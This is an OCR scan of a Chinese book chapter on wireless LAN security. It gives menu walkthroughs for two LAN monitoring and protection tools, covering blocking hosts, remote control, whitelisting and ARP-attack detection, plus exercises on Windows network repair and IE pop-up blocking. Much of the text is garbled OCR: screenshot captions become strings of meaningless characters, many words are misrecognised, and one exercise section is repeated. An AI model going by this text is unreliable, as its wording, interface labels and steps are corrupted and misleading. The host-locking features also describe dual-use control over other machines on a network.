可 以 利用 “长 角 牛 网 络 监控 机 ”工具 
保护 指定 的 卫 地 址 段 。 在 “长 角 牛 网 络 监控 
机 ”窗口 中 选择 “设置 ”一 “JIP 保 护 ” 菜 单 
项 ， 即 可 打开 “JP 保护 ”对 话 框 。 在 其 中 设 
置 要 保护 的 IP 段 后 ， 单 击 “ 添 加 ”按钮 ， 即 
可 将 该 IP 段 添加 到 “已 受 保护 的 IP 段 ”列表 
中 ， 如 下 图 所 示 。 

IP 保 护 


Pd st 


设置 受 保护 IP 
指定 IF 段 ， 
从 lis2.168.0.1 
到 j192.168.0.254 


添加 >> | 
晤 除 《< 


站 rh 
设置 站 Je 人 扩展， 已 


已 受 保 护 的 IF 段 : 
[01] 192.168.0.1 - 192.168.0.254 


确定 | 取消 | 


[step 轩 在 “长 角 牛 网 络 监控 机 ”工具 中 还 
可 以 设置 敏感 主机 。 在 “长 角 牛 网 络 监控 
机 ”窗口 中 选择 “设置 ”一 “敏感 主机 ” 
菜单 项 ， 即 可 打开 “设置 敏感 主机 ”对 话 
框 ， 在 “敏感 主机 MAC” 文 本 框 中 输入 目 
标 主机 的 MAC 地 址 后 单 击 »》” | 按钮 ， 即 可 
将 该 主机 设置 为 敏感 主机 ， 如 下 图 所 示 。 
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设置 敏感 主机 xX 
敏感 主机 列表 : 


敏感 主机 MAC: 
|00-23-24-D9-B6-E5 ”| 


确定 取消 | 


在 “长 角 牛 网 络 监控 机 ”窗口 中 选择 

“设置 ”一 “远程 控制 ”菜单 项 ， 即 可 打 
开 “ 远 程控 制 ” 对话 框 ， 在 其 中 选中 “ 接 
受 远程 命令 ” 复 选 框 ， 并 输入 目标 主机 的 IP 
地 址 和 口令 后 ， 即 可 对 该 主机 进行 远程 控 
制 ， 如 下 图 所 示 。 


远程 控制 
接受 远程 命令 并 作出 相应 的 控制 操作 。 
受 控 设 置 
lV 接受 远程 命令 
对 方 IF: | 192. 168. 0. 102| 
对 方 端口 (TcP): | 17868 默认 端口 | 


0$: r 
和 定 | 取消 | | 更 多 > | 


在 “长 角 牛 网 络 监 控 机 ”窗口 中 选择 

Eve 证 
开 “ 主 机 保护 ”对 话 框 ， 在 选中 “启用 主 
机 保护 ” 复 选 框 后 ， 输 入 要 保护 主机 的 IP 地 
址 和 网 卡 地 址 ， 之 后 单 击 “ 加 入 ”按钮 ， 
即 可 将 该 主机 添加 到 “ 受 保护 主机 ”列表 
中 ， 如 下 图 所 示 。 


主机 堡 沪 Xx 


厅 启用 主机 保护 但 3 度 : [5 | 
设置 
ES - 融 保 护 主 机 = 
ip 地 j 过 
[ez 0 - [C3] 192. 168.0. 106 00-23-24- 
网 下 地址。 。 [到 | | | 移出 << | 
[po-23-24-19 -BB-ES5 
时 保护 
4 
eR 训 2 < > 
厂 保护 全 网 (虚拟 机 中 愤 用 ) 
厂 保护 自身 
ee 动 封 祝 hh 欺骗 : 
| 厂 断 开 与 所 有 主机 过 了] 
厂 信用 主机 保护 并 且 和 局 # 时 不 再 显示 
| 确定 


在 “长 角 牛 网 络 监 控 机 ”工具 中 还 
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可 以 添加 新 的 用 户 。 在 “长 角 牛 网 络 监控 
机 ”窗口 中 选择 “用 户 ” 一 “添加 用 户 ” 
菜单 项 ， 即 可 打开 New user 对 话 框 ， 在 
MAC 文 本 框 中 输入 新 用 户 的 MAC 地 址 后 ， 

单 击 “保存 ”按钮 即 可 实现 添加 新 用 户 操 
作 ， 如 下 图 所 示 。 


New user x 


一 添加 新 用 户 
MAC: |00-10-24-56-89-Df£ 
注释 : | 手工 加 入 ，2017-08-15 09:50。 


权限 设置 | | 保存 | 取消 | 


在 “长 角 牛 网 络 监控 机 ”窗口 中 选择 
六” 这 各 添加 ” 菜 间 项， 印 可 和 
开 “远程 获取 用 户 ” 对 话 框 ， 在 其 中 输入 远 
程 计算 机 的 人 P 地 址 、 数 据 库 名 称 、 登 录 名 称 以 
及 口令 之 后 ， 单 击 “ 连 接 数据 库 ” 按 钮 ， 即 
可 从 该 远程 主机 中 读 取 用 户 ， 如 下 图 所 示 。 

it IEEEC 


数据 库 名 称 : NserData 
县 录 名 称 : [sa 


训 职 的 月 户 教 据 


上 E 澡 | 
这 接 数 据 库 
过 县 表 [| | 
适 择 对 区 字段 名 : 


如 果 禁 止 无 线 局 域 网 内 某 一 台 计 算 机 
的 网 络 访问 权限 ， 则 可 在 “长 角 牛 网 络 监 
控 机 ”窗口 内 右 击 该 计算 机 ， 在 弹出 的 快 
捷 菜 单 中 选择 “锁定 /解锁 ”选项 ， 即 可 打 
开 “ 锁 定 /解锁 ”对 话 框 ， 如 下 图 所 示 。 
EU xy 
网 卡 : |68-FB-7E-EA-FC-FA [网 卡 生产 厂家 不 详 ] | 
注释 : 阿 EFF 和 F 主 


加 十 
请 不 要 对 i 考 如 路 由 器 、 交 换 机 、 服务 器 等 网 络 关键 设备 进行 锁定 。 
锁定 方式 : 
个 不 锁定 〈 解 锁 ) 
个 禁止 与 以 下 关键 主机 组 的 TCP/TP 连 接 
『 第 1 「 弟 2 纪 上 率 | 刘 4 浊 
荐 部 62 日 夯 后 z 晶 画 = 画 本 有 xz 日 
G 禁止 与 所 有 主机 的 TCPAIP 这 接 ( 除 敏感 主机 外 ) 


确定 | 取消 | 


step 加 在 其 中 选择 目标 计算 机 与 其 他 计算 机 
(或 关键 主机 组 ) 的 连接 方式 之 后 ， 单 击 
“确定 ”按钮 ， 即 可 禁止 该 计算 机 访问 相 
应 的 连接 ， 如 下 图 所 示 。 


二 长 旬 牛 网 络 些 扯 山 试用 版 v3.56 一 口 x 
系统 [TT 设 要 [fs] 用户 [U] 数据 [D】 其 助 [ 


加 二 机 站 坟 ” 证 机 到 用户 | 加 下 关上 监 届 | 外 记录 在 自 | 


[局 卡 烛 目 肥 地 址 刁 负 组 /主机 :用 户 I 3 I 下 玉生 
了 4-63-CI-33-60-73 8S 192. 186. 0.1 必 20L7-06-15 09:37:;4e 
人 23-24- 吧 -86-5 192. 1668 0.105 (人 YoORR5HDUE ”IFZSIMTOP 2z0L7-09-]5 09:3745 一 
Ca-60-00-90-CC-01 = 1%. 168. 0.12 MOEESEDUE 7 MPOIG... 20L7-08-15 09:37.46 一 
( 国 56- 6-64-FfF-6-10 192. 166 0 LC7 Le 和风 “ 主 控 器 ] 月 0L7-03-15 09:37 -45 一 
QA-dd-DL-D3-40-76 虽 192. 166.0.10 20L7-09-15 09:37:47 一 
二 5d4-8-52-36-17-01 | 192. 166 0 LC3 [中 一 20L7-08-15 09:39-27 一 


\ 国 00-10-24-55-68 下 上 


起 写本 本 ,将 在 13 分 捉 后 结束 管理 有 


用 户 总 数 ;8 在 法 ;7 非法 Tecp:53 Udp:19 运行 00:16'28” 


在 “长 角 牛 网 络 监控 机 ”窗口 内 选中 

雪白 计 基 信息 并 上 去 ， 在 弹出 的 快捷 菜单 
中 选择 “手工 管理 ”选项 ， 即 可 打开 “手工 
管理 ”对 话 框 ， 在 其 中 即 可 手动 设置 对 该 计 
算 机 的 管理 方式 ， 如 下 图 所 示 。 


手 二 管理 Xx 


—Static 
网 卡 : |68-FB-7E-EA-FC-FA [[o 卡 生产 厂家 不 详 ] 
注释 : | 网 卡 生产 厂家 不 详 
IF: |192. 168.0. 105 
名 称 : |- /-/- 


获 告 
请 不 要 对 诸如 路 由 器 、 交 换 机 、 服务 器 等 网 络 关键 设备 进行 管理 。 


一 管理 方式 
厂 If 冲 突 
厂 禁止 与 关键 主机 组 进行 TCP/TP 巡 接 
『 第! 组 “三 弟 2 矿 第 3 组 厂 第 4 组 关键 主机 组 | 
三 第 5 组 。” 厂 第 6 组 记 第 组 所 第 8 组 敏感 主机 


三 畦 止 与 所 有 主机 进行 TCP/IP 演 接 ( 除 敏感 主机 外 ) 
断 开 方式 | 荐 黑 电 开 =] 厂 高 级 阻 断 
管理 频率 : [12 了 | 帮助 | 


开始 | | 结束 | 


在 “长 角 牛 网 络 监控 机 ”工具 中 还 可 
以 给 指 定 的 主机 发 送 消息 。 在 “长 角 牛 网 

ee 口中 选中 某 台 计算 机 信息 并 

单 击 鼠 标 右 键 ， 在 弹出 的 快捷 菜单 中 选择 
“发 送 消息 ”选项 ， 即 可 打开 Send message 

对 话 框 ， 在 其 中 输入 要 发 送 的 消息 后 ， 单 

击 “ 发 送 ” 按 钮 ， 即 可 给 该 主机 发 送 指 定 
的 消息 ， 如 下 图 所 示 。 


管理 次 数 :0 


第 14 章 ”无线 局 域 了 网 的 安全 防护 ER 全 


Send message X 
消 外 只 有 开启 了 消息 服务 ， 并 且 被 正确 取出 名 称 的 用 户 ， 才 能 接收 到 此 
发 送 至 : 40-A5-EF-DE-A9-D3 [9 卡 生 产 广 家 不 详 ] 


IP: li92.168.0108 
名 称 : |WORKGROUP 7 网 络 科技 / 网 络 科技 


发 送 者 : | 长 角 牛 网 络 监控 机 
接收 者 : 网 络 科 技 
发 送 次 数 : [1 过。 公主 册 版 能 设置 发 送 者 名 称 及 发 送 次 数 。 
正文 : | 你 好 


发 送 | 结束 | 


14.4.3 大势 至 局 域 网 安全 卫士 


大 势 至 局 域 网 安全 卫士 是 一 款 专业 的 
局 域 网 安全 防护 系统 ， 它 能 够 有 效 地 防止 
外 来 计算 机 接 入 公司 无 线 局 域 网 ， 有 效 隔 
离 无 线 局 域 网 计算 机 ， 并 且 还 有 禁止 计算 
机 修改 了 P 和 MAC 地 址 、 检 测 局 域 网 混杂 模 
式 网 卡 、 防 御 局 域 网 ARP 攻 击 等 功能 。 

使 用 大 势 至 局 域 网 安全 卫士 防护 系统 
安全 的 操作 步骤 如 下 。 
下 载 并 安装 大 势 至 局 域 网 安全 卫士 ， 
即 可 打开 “大 势 至 局 域 网 安全 卫士 ”工作 
界面 ， 如 下 图 所 示 。 


圈 六 垫 至 后 域 网 安全 卫士 V3.1 - 试用 版 一 口 Xx 
关于 软件 ”关于 我 们 。 访 同 已 网。 ”购买 沉 程 ”了 鸡 系 我 们 大助 《远程 协助 
请 选择 网 卡 Jetyork adapter “请 theros AtcLOD1 Gigabit Fthernet Controllar ~ 


白 志 单 (8 公司 内 部 电脑 ) 操作 
| | 主机 杖 坊 ”硬件 地 址 工地 址 主机 名 所 而 


升 始 监 控 


自动 而 高 外 未 电脑 /手机 ;平板 | 检 独 自动 隔 族 局 二 网 无 线 跑 由 器 检测 


问 白 名 单 于 地 址 误 更 时 自 亢 丙 离 白 和 名 单 Wc 地 址 亦 更 时 自动 隔 高 
加 发 现 AIT 攻 击 时 输出 等 报信 息 发 现 局 域 隐 FP 攻击 时 自 动 陨 高 
对 检测 并 隔 敲 局域网 长 理 探 刚 | 回 检 册 下 杂 剖 式 必 时 报警 | 检测 | 操作 
味 名 单 ( 甩 公司 外 部 电 肪 ) 
ERESTESETTTETTT 交 村 本目 (和 ) 
隔 高 方式 
自动 隔离 
手动 隔 高 
强制 隔 高 
隔 高 选项 
禁止 访问 内 网 
禁止 访 ia 网 
网 络 安 全 事件 查 香 历 史记 录 “ 理 空 输出 记录 
| 条件 地 址 IF 描述 | 入 ] 限 
口 强 全 中 口 罗 


单 击 “开始 监控 ”按钮 ， 即 可 开始 
监控 当前 无 线 局 域 网 中 的 计算 机 信息 ， 对 


黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


于 无 线 局 域 网 外 的 计算 机 将 显示 在 “ 黑 名 
单 ” 窗 格 之 中 ， 如 下 图 所 示 。 


轩 大 势 至 局域网 安全 了 士 V3.1 - 试用 版 一 口 x 
关于 软件 ”关于 我 们 ”访问 言 网 购买 济 层 。 联系 我 们 如 助 《远程 协助 


请 选择 网 卡 Hetvork adapter 'Atheros AtdDol Gigabit Ethernet Contraller v 

和 白 加 单 [ 印 必 可 内 部 电 锌 ) 捍 作 

| “主机 林 态 齐 佣 地 址 Ff 闻 址 主机 名 毛 斩 
A 
S 出 
有 图 
i 

物 至 里 名 单 
自动 | 珊 高 外 未 电 锌 “手机 "平板 ， 检 曾 ， 同 自 邢 训 局 | 颗 习 无 绪 队 由 时 检 
回 自 名 单 TI? 地 址 守 更 时 自动 汤 高 区 白 忆 单 WAC 志 址 变更 时 自古 高 
回 发 现 NT 卫 击 时 得 出 密 报 伟 息 发 现 易 域 同 MB? 攻击 时 自 动 滑 高 


裕 玫 并 同 高 吕 域 网 代 理 琛 出 思 窒 测 到 昌 杂 神 式 网 卡 时 根 吕 | 检 询 a 
里 名 单 ( 即 公司 四 部 电脑) 


ET ETIE7 
图 L 后 高 方式 
口 | 图 | 4DhSEFDEASn3 192 166.0 105 500 | SEU 
口 可 ca50D003ccc01 192 158.0.112 350 | 过 殷 加 六 
口 ， 加 002sesnopsps5 |192 169.0.105 am | 强 电 届 高 
僻 高 选 页 
回 基 止 访问 内 网 
回 基 止 访 ij 相亲 
和 全 否 直 历史 记录 清空 轿 由 记录 
ET 开 撒 洒 侈 高 度 
中 〇 强国 中 申明 


如 果 确 定 某 侣 计算 机 是 无 线 局 域 网 内 的 
计算 机 ， 则 可 以 在 “ 黑 名 单 ” 窗 格 中 选中 该 计 
算 机 信息 ， 然 后 单 击 “ 移 至 白 名 单 ” 按 钮 ， 将 
其 移动 到 “ 白 名 单 ” 窗 格 之 中 ， 如 下 图 所 示 。 


国 大 势 至 后 域 网 安全 卫士 V3.1 - 试用 版 口 x 
关于 软件 ”关于 我 们 访问 言 网 。 购买 流 息 ”联系 我 们 ”和 估 对 ”远程 协 助 
请 选择 网 卡 Wetyork adapter Atharos AtcdDDl Gigabit Ethernet Controller 省 止 监控 
日 名 单 [ 即 公司 内 部 电 接 ) 操作 
| 天 机 杖 六 大作 二 此 II 主机 名 二 加 
;1 92 156. 0. 108 
2 副 0023z403BsF5 192 156 0 106 导入 
二 
肿 际 
清空 
移 玉 里 名 单 
自动 而 高 外 未 电镜 /手机 * 平 概 ， 术 曾 加 自 却 疝 训 剧 晤 q 元 线 背 由 器 | 接 训 
团 自 名 单 I? 地 址 变更 时 自动 涌 高 区 白 名 弟 5 均 址 宾 更 时 自 纯 识 训 
同 发 现 X37 攻 击 时 辆 出 次 报 信息 发 现 局 域 同 XR? 忒 击 时 自动 济 高 
回 榨 测 封 后 高 局 域 同 代理 茎 别 ， 回 寝 列 到 品 休 核 藉 同 卡 时 撒 客 检 玉 括 作 
黑 若 单 ( 即 公司 外 部 电脑 
| 选择。 主机 杖 态 ” 齐 尾 地 址 JI? 地 站 和 君 | 余 时 站 〈 镍 ) 
口 可 53F634FE5310 -192166.0.107 Ey | “局 高 方 未 
加 cmanl 192. 15.0.112 (294 SEU 
过 手 地 六 
口 | 加 itpip3437B |198 .169.0.100 |300 | 强 申 高 吉 
局 高 送 而 
问 禁止 访 问 内 网 
器 雄 止 访 史 9 
网 络 实 全 事 虞 查看 历史 记录 “ 洼 空 辑 出 记录 
ET EE sa 
口 强 团 中 口 忆 


单 击 “自动 隔离 局 域 网 无 线路 由 器 ” 
右 侧 的 “检测 ”按钮 ， 可 以 检测 当前 无 线 
局 域 网 中 存在 的 无 线路 由 器 设备 信息 ， 并 
在 “网 络 安全 事件 ” 窗 格 中 显示 检测 结 
果 ， 如 下 图 所 示 。 


302 


圈 大 的 至 后 域 网 安全 卫 十 V3.1 - 试用 版 一 口 X 
关于 软件 ”关于 我 们 访问 官网 。 购 实 流 得 联 笃 我 们 。 考 肋 ” 远 往 协助 


请 选择 网 卡 Jetsyork sdapter "Atheros AtcLOD1 Gigabit Ethernet Controller ~ 开始 监控 
白 名 单 妃 [公司 内 部 电脑 ) 操作 
主机 杖 访 “ 硕 件 地 址 Th 地 址 增加 
1!| 贺 40857FDEA5D3 152. 163.0. 106 a 
;2 国 员 
导出 
明 除 
清空 
移 至 黑 名 单 
自动 高 外 来 电脑/ 手机 /平板 | 检 刚 “| 加 自动 隔离 局 | 吉林 无 线路 由 器 
回 和 白 名 单 下 地 址 变更 时 自给 名 高 白 名 单 C 地 址 变更 时 自动 隔 高 
时 友 现 ARF 攻 击 时 输出 警报 信息 发 丽 局 二 网 EP 攻击 果 自 未 了 品 离 
名 榨 测 嵌 卫 高 局 雪 网 居 理 探测 术 弄 上 呈 杂 敬 式 网 卡 时 报警 | 栓 弄 ， 操作 
黑 名 羊 妃 0 公司 外 部 电 应 》 
移 至 白 忆 单 
进 择 ”主机 状态 ”硬件 地 址 I? 地 址 乔 余 时 间 【 种 ) 
隔 痪 方式 
目 动 隅 高 
手动 隔离 
强制 隔 高 
隔离 选 硕 
于 止 访 问 内 网 
站 茜 止 访问 外 同 
网 络 安全 事件 亚 在 历史 记录 “ 香 空 放出 记录 
四 ET Th 所 过 2 
» 192. 166.0. 104 〇 强 图 中 中 凡 


192.189.0.112 


检测 至 ac:00-127-6C- 和 -13 .. 
C8-60-C0-9C-... 


| 检测 | 有 ae: [8S-60-00-SC-C- .. 


[step 图 单 去 “查看 历史 记录 ”按钮 ， 即 可 打 
开 “IPMAC- 记 事 本 ”窗口 ， 在 其 中 查看 检 
测 ] 2 吉 果 ， 如 下 图 所 示 。 


司 IPMAC - 记事 本 一 口 Xx 
文件 (。 靖 毕 (E) 枪 f(O) 坦 看 (V) 帮助 (H) 

实 宙 到 Jac:00-1E-8C-AD-13-5F， 

Y 视 | 全 ac :C8-60-00-9C-CC-D1, 

Y 视 | 全 Nac : 84-BE-52-3B-17-01, IP: 192. 168. 0. 103 氏 

发 测 Nac:00-1E-8C-AD-13-5F, IP:192.168.0.104n 

沪 讽 | 全 Mac:C8-60-00-9C-CC-D1，IP:192. 168. 0. 1126 


大 势 至 局 域 网 安全 卫士 常用 功能 介绍 
如 下 。 

EL 
平板 ” 复 选 框 : 禁止 外 部 计算 机 (如 笔记 
本 ) 或 移动 设备 〈 如 平板 计算 机 或 手机 ) 
接 入 单位 无 线 局 域 网 访问 因特网 。 


“上 自动 隔离 外 来 计算 机 /手机 / 


(2) “ 目 动 隔离 无 线 局 域 网 无 线路 由 
器 ” 复 选 框 :， 当 检 测 到 无 线 局 域 网 中 存在 
无 线路 由 器 时 ， 上 自动 将 其 隔离 。 

(3) “ 白 名 单 IP 地 址 变更 时 自动 隔 
离 ” 复 选 框 : 禁止 单位 内 部 计算 机 修改 也 地 
址 ， 防 止 IP 地 址 次 用， 防止 IP 冲 突 攻 击 ， 防 
止 越权 上 网 或 逃避 网 络 监控 。 


(4) “ 白 名 单 MAC 地 址 变更 时 自动 
隔离 ” 复 选 框 : 禁止 单位 内 部 计算 机 修改 
MAC 地 址 。 

(5) “发 现 ARP 攻 击 时 输出 报警 信 
息 ” 复 选 框 ， 当 发 现 ARP 攻 击 时 ， 输 出 报警 
信息 。 

(6) “发现 无 线 局 域 网 ARP 攻 击 时 目 
动 隔 离 ” 复 选 框 ， 当 检测 到 无 线 局 域 网 中 
存在 ARP 攻 击 时 ， 上 自动 将 发 出 ARP 攻 击 的 
计算 机 隔离 。 

(7) “检测 并 隔离 无 线 局 域 网 代理 ” 
复 选 框 : 检测 无 线 局 域 网 中 是 否 存 在 代理 
服务 器 ， 一 旦 检测 到 就 会 将 其 隔离 。 

(8) “检测 到 混杂 模式 网 卡 时 报警 ” 
复 选 框 : 检测 无 线 局 域 网 内 处 于 混杂 模式 
的 网 卡 ， 防 止 无 线 局 域 网 计算 机 运行 黑客 
软件 、 嗅 探 软 件 、 抓 包 软 件 等 ， 当 检测 出 
来 后 给 出 报警 信息 。 


14.5 ”实战 演练 
实战 演练 1 一 一 诊断 和 修复 网 络 不 通 


当 上 自己 的 计算 机 不 能 上 网 时 ， 说 明 计 
算 机 与 网 络 连 接 不 通 ， 这 时 就 需要 诊断 和 
修复 网 络 了 ， 具 体 的 操作 步骤 如 下 。 
打开 “网 络 连接 ”窗口 ， 选 中 需要 诊 
断 的 网 络 图 标 并 右 击 ， 在 弹出 的 快捷 菜单 
中 选择 “诊断 ”选项 ， 弹 出 “Windows 网 络 
诊断 ”窗口 ， 并 显示 网 络 诊断 的 进度 ， 如 下 
图 所 示 。 


司 Windows 网 阁 诊断 


正在 检测 问题 


第 14 章 ”无线 局 域 网 的 安全 防护 早早 


step 图 诊断 完成 后 ， 将 会 在 下 方 的 窗 格 中 显 
示 诊 断 的 结果 ， 如 下 图 所 示 。 


司 Windows 网 络 涂 断 


其 余 修 复 操 作 需要 具有 管理 员 权 限 


已 找到 问题 
适配器 "以 大 网 "已 禁用 四 


曙 兰 试 以 管理 员 身 份 进行 这 些 修复 
一 浏览 其他 选项 


查看 详细 信息 


关闭 
单 击 “尝试 以 管理 员 身份 进行 这 些 修 


复 ” 链 接 ， 即 可 开始 对 诊断 出 来 的 问题 进 
行 修复 ， 如 下 图 所 示 。 


到 Windows 网 络 涂 断 


正在 解决 问题 


正在 验证 是 否 已 解决 网 络 适 配 总 配置 问题 .. 


修复 完毕 后 ， 会 给 出 修复 的 结果 ， 提 
示 用 户 疑 难 解答 已 经 完成 ， 并 在 下 方 显 示 
已 修复 信息 提示 ， 如 下 图 所 示 。 


到 Windows 网 络 涂 断 


疑难 解答 已 充 成 
终 难 甫 答 已 对 系统 进行 了 一 毕 更 改 。 请 兰 坛 之 前 曾 兰 试 执行 的 任务 。 


已 找到 问题 


运 配 右 " 以 大 网 "已 禁用 已 修复 Ey) 


一 关闭 疑难 解答 


一 浏览 其 他 选项 
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实战 演练 2 一 一 屏蔽 网 页 广告 弹 窗 


Interest Explorer 11 浏 览 器 具有 屏蔽 网 


页 广告 弹 窗 的 功能 ， 使 用 该 功能 屏蔽 网 页 
广告 弹 窗 的 操作 步骤 如 下 。 

在 IE 11 浏 览 器 的 工作 界面 中 选择 “ 工 
具 ” 一 “弹出 窗口 阻止 程序 ”菜单 命令 ， 
如 下 图 所 示 。 


XxX 
下 这 国 - 图 htpz/www 只- 吕 上 | 团 百 这 一 下 .你 tt 是 
文人 将 名 |， 音 石 V| 改变 六 同属 可 “wm 

衰 除 浏览 历史 记 双 (Dj 

Inprivate 浏 过 中 

关 财 跨 距 保护 (入 

ActiveX 知 运 [0] 

焦 芷 注 流 问 是 (CQ) 

导 敌 打开 上 次 浏览 屎 面 [S) 

棕 时 吉 添 加 引 应 月 - 帘 国 从 

去 写 下 更 {N) Cyl+) 


Crrl+Shift+Del 局 
Ctritshit+P 民 频 ”上 贴 如 登录 设置 更 学 产 品 


Ctrl+Shif+U 


报喜 网 站 问题 (R) | 立 030173 三 百度 推 
Internet 远 项 [O) et 
< ee 的 ?> 


打开 “弹出 窗口 阻止 程序 ”对 话 框 ， 
提示 用 户 是 否 确 实 要 启用 Interest Explorer 弹 
出 窗口 阻止 程序 ， 如 下 图 所 示 。 


弱 出 窗口 胆 止 程序 


0 确实 要 启用 Intemet Explorer 弹 闪 口上 胆 止 程 访 后 ? 


sm | 


单 击 “是 ”按钮 ， 即 可 启用 该 功能 ， 
然后 选择 “工具 ”一 “弹出 窗口 阻止 程 
序 ” 一 “弹出 窗口 阻止 程序 设置 ”菜单 命令 ， 
如 下 图 所 示 。 


- DO Xx 
吾 放 国 - 图 htpzywww 训 ” 驴 忆 图 百度 一下, 人 ME - 

文件 日 、 汕 E} 二 VI 以 这 二) 车 

Ctrl+Shif3Del 

ctrtshit+p 。 作 拓 。 点 到 登录 这 于 


加 和 辆 打 和 开 上 次 浏览 区 辐 [S) 
格 上 由 点 添加 3 应 用 "机 周 人) 


性 楷 羽 突 板 
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Send to OneNote 

报 吉 网 站 问题 (R) | 说 氢 证 030173 号 

Internet 远 mIO) 


304 


14.6 


打开 “弹出 窗口 阻止 程序 设置 ”对 话 
框 ， 在 “要 允许 的 网 站 地 址 ”文本 框 中 输 
入 允许 的 网 站 地 址 ， 如 下 图 所 示 。 


弹出 罕 口 阻止 程序 设 伍 Xx 
例外 
] 弹出 窗口 当前 已 祝 阻 止 。 你 可 以 将 符 定 网 站 党 加 到 下 专 中 ， 从 而 克 许 末 自 
.用 该 站 点 的 弹出 亩 口 - 
要 多 许 的 网 站 地 址 [V): 
允许 的 站 点 (9): 
到 降 (R: 
全 部 得 除 (6. 
遥 知 和 阳 止 级 别 ; 
组 止 沂 出 春 口 时 莫 放 声音 [ 吕 . 
回 组 止 笠 出 宁 口 时 至 示 滨 知 社 (N)， 
提 止 未 别 (B): 
中 ; 胆 止 大 多 数 育 动 洋 出 次 口 号 
关闭 (O) 


单 击 “ 添 加 ”按钮 ， 即 可 将 输入 的 网 
站 地 址 添加 到 “允许 的 站 点 ”列表 当中 。 
单 击 “关闭 ”按钮 ， 即 可 完成 弹出 窗口 阻 
止 程序 的 设置 操作 ， 如 下 图 所 示 。 


漳 出 窗口 阻止 程序 设 嫩 x 
例外 
弹出 窗口 当前 已 被 阻止 。 你 可 以 格 特 定 两 站 添加 到 下 专 巾 ， 从 而 允许 率 自 
"| ”该 让 三 的 综 击 知 口 . 
到 允许 的 两 站 地 址 [(W]: 
添加 (A) 
区 许 的 站 点 (9); 
莉 除 (R) 
全 部 删除 (E)... 
通知 和 阳 止 级 别 ; 
阻止 弹出 窗口 时 接 放 声 苔 (Pp). 
回 阻 止 傣 击 符 口 时 所 示 垦 知 芒 IN). 
阳 止 未 别 (B)}: 
中 : 上 胆 止 大 和 数目 动 洋 旱 哥 口 v 
关闭 人) 


小 试 身 手 


练习 1: 无 线 局 域 网 查看 工具 的 使 用 。 
练习 2: 无 线 局 域 网 攻击 工具 的 使 用 。 
练习 3: 无 线 局 域 网 安全 辅助 工具 的 


使 用 。 
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实战 演练 2 一 一 屏蔽 网 页 广告 弹 窗 


Interest Explorer 11 浏 览 器 具有 屏蔽 网 


页 广告 弹 窗 的 功能 ， 使 用 该 功能 屏蔽 网 页 
广告 弹 窗 的 操作 步骤 如 下 。 

在 IE 11 浏 览 器 的 工作 界面 中 选择 “ 工 
具 ” 一 “弹出 窗口 阻止 程序 ”菜单 命令 ， 
如 下 图 所 示 。 


XxX 
下 这 国 - 图 htpz/www 只- 吕 上 | 团 百 这 一 下 .你 tt 是 
文人 将 名 |， 音 石 V| 改变 六 同属 可 “wm 

衰 除 浏览 历史 记 双 (Dj 

Inprivate 浏 过 中 

关 财 跨 距 保护 (入 

ActiveX 知 运 [0] 

焦 芷 注 流 问 是 (CQ) 

导 敌 打开 上 次 浏览 屎 面 [S) 

棕 时 吉 添 加 引 应 月 - 帘 国 从 

去 写 下 更 {N) Cyl+) 


Crrl+Shift+Del 局 
Ctritshit+P 民 频 ”上 贴 如 登录 设置 更 学 产 品 


Ctrl+Shif+U 


报喜 网 站 问题 (R) | 立 030173 三 百度 推 
Internet 远 项 [O) et 
< ee 的 ?> 


打开 “弹出 窗口 阻止 程序 ”对 话 框 ， 
提示 用 户 是 否 确 实 要 启用 Interest Explorer 弹 
出 窗口 阻止 程序 ， 如 下 图 所 示 。 


弱 出 窗口 胆 止 程序 


0 确实 要 启用 Intemet Explorer 弹 闪 口上 胆 止 程 访 后 ? 


sm | 


单 击 “是 ”按钮 ， 即 可 启用 该 功能 ， 
然后 选择 “工具 ”一 “弹出 窗口 阻止 程 
序 ” 一 “弹出 窗口 阻止 程序 设置 ”菜单 命令 ， 
如 下 图 所 示 。 


- DO Xx 
吾 放 国 - 图 htpzywww 训 ” 驴 忆 图 百度 一下, 人 ME - 

文件 日 、 汕 E} 二 VI 以 这 二) 车 

Ctrl+Shif3Del 

ctrtshit+p 。 作 拓 。 点 到 登录 这 于 


加 和 辆 打 和 开 上 次 浏览 区 辐 [S) 
格 上 由 点 添加 3 应 用 "机 周 人) 
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打开 “弹出 窗口 阻止 程序 设置 ”对 话 
框 ， 在 “要 允许 的 网 站 地 址 ”文本 框 中 输 
入 允许 的 网 站 地 址 ， 如 下 图 所 示 。 


弹出 罕 口 阻止 程序 设 伍 Xx 
例外 
] 弹出 窗口 当前 已 祝 阻 止 。 你 可 以 将 符 定 网 站 党 加 到 下 专 中 ， 从 而 克 许 末 自 
.用 该 站 点 的 弹出 亩 口 - 
要 多 许 的 网 站 地 址 [V): 
允许 的 站 点 (9): 
到 降 (R: 
全 部 得 除 (6. 
遥 知 和 阳 止 级 别 ; 
组 止 沂 出 春 口 时 莫 放 声音 [ 吕 . 
回 组 止 笠 出 宁 口 时 至 示 滨 知 社 (N)， 
提 止 未 别 (B): 
中 ; 胆 止 大 多 数 育 动 洋 出 次 口 号 
关闭 (O) 


单 击 “ 添 加 ”按钮 ， 即 可 将 输入 的 网 
站 地 址 添加 到 “允许 的 站 点 ”列表 当中 。 
单 击 “关闭 ”按钮 ， 即 可 完成 弹出 窗口 阻 
止 程序 的 设置 操作 ， 如 下 图 所 示 。 


漳 出 窗口 阻止 程序 设 嫩 x 
例外 
弹出 窗口 当前 已 被 阻止 。 你 可 以 格 特 定 两 站 添加 到 下 专 巾 ， 从 而 允许 率 自 
"| ”该 让 三 的 综 击 知 口 . 
到 允许 的 两 站 地 址 [(W]: 
添加 (A) 
区 许 的 站 点 (9); 
莉 除 (R) 
全 部 删除 (E)... 
通知 和 阳 止 级 别 ; 
阻止 弹出 窗口 时 接 放 声 苔 (Pp). 
回 阻 止 傣 击 符 口 时 所 示 垦 知 芒 IN). 
阳 止 未 别 (B)}: 
中 : 上 胆 止 大 和 数目 动 洋 旱 哥 口 v 
关闭 人) 


小 试 身 手 


练习 1: 无 线 局 域 网 查看 工具 的 使 用 。 
练习 2: 无 线 局 域 网 攻击 工具 的 使 用 。 
练习 3: 无 线 局 域 网 安全 辅助 工具 的 


使 用 。 


